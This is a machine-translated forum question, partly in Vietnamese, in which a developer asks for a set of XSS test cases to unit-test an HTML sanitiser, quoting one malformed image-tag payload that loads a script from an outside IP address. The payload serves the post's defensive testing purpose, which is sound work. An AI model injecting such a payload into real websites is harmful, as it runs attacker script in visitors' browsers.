Tôi đang tìm cách viết một trình khử trùng html, và rõ ràng là để kiểm tra/chứng minh rằng nó hoạt động đúng, tôi cần một bộ các ví dụ XSS để chống lại nó để xem nó hoạt động như thế nào. Dưới đây là một nice example from Coding HorrorKiểm tra tra tấn XSS - có tồn tại không?
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
Tôi biết có một Mime Torture Test trong đó bao gồm một số email lồng nhau với file đính kèm được dùng để kiểm tra bộ giải mã Mime (nếu họ có thể giải mã nó đúng cách, sau đó họ đã được chứng minh để làm việc). Về cơ bản, tôi đang tìm kiếm một equivilent cho XSS, tức là một danh sách các ví dụ về html dodgy mà tôi có thể ném vào của tôi sanitiser chỉ để đảm bảo rằng nó hoạt động OK.
Nếu bất kỳ ai cũng có bất kỳ tài nguyên nào tốt về cách viết thuốc khử trùng (nghĩa là những người khai thác phổ biến cố gắng sử dụng, vv), họ cũng sẽ được biết ơn.
Cảm ơn trước :-)
Edit: Xin lỗi nếu điều này là không rõ ràng trước đó, nhưng tôi đã sau một loạt các thử nghiệm tra tấn vì vậy tôi có thể viết các unit test cho các sanitiser, không kiểm tra nó trong trình duyệt , vv Dữ liệu nguồn theo lý thuyết có thể đến từ bất cứ đâu - không chỉ là một trình duyệt.
Cụ thể là "Định dạng XML của XSS Cheat Sheet", mà tôi đã bỏ lỡ lần đầu tiên tôi xem trang đó .. – dbr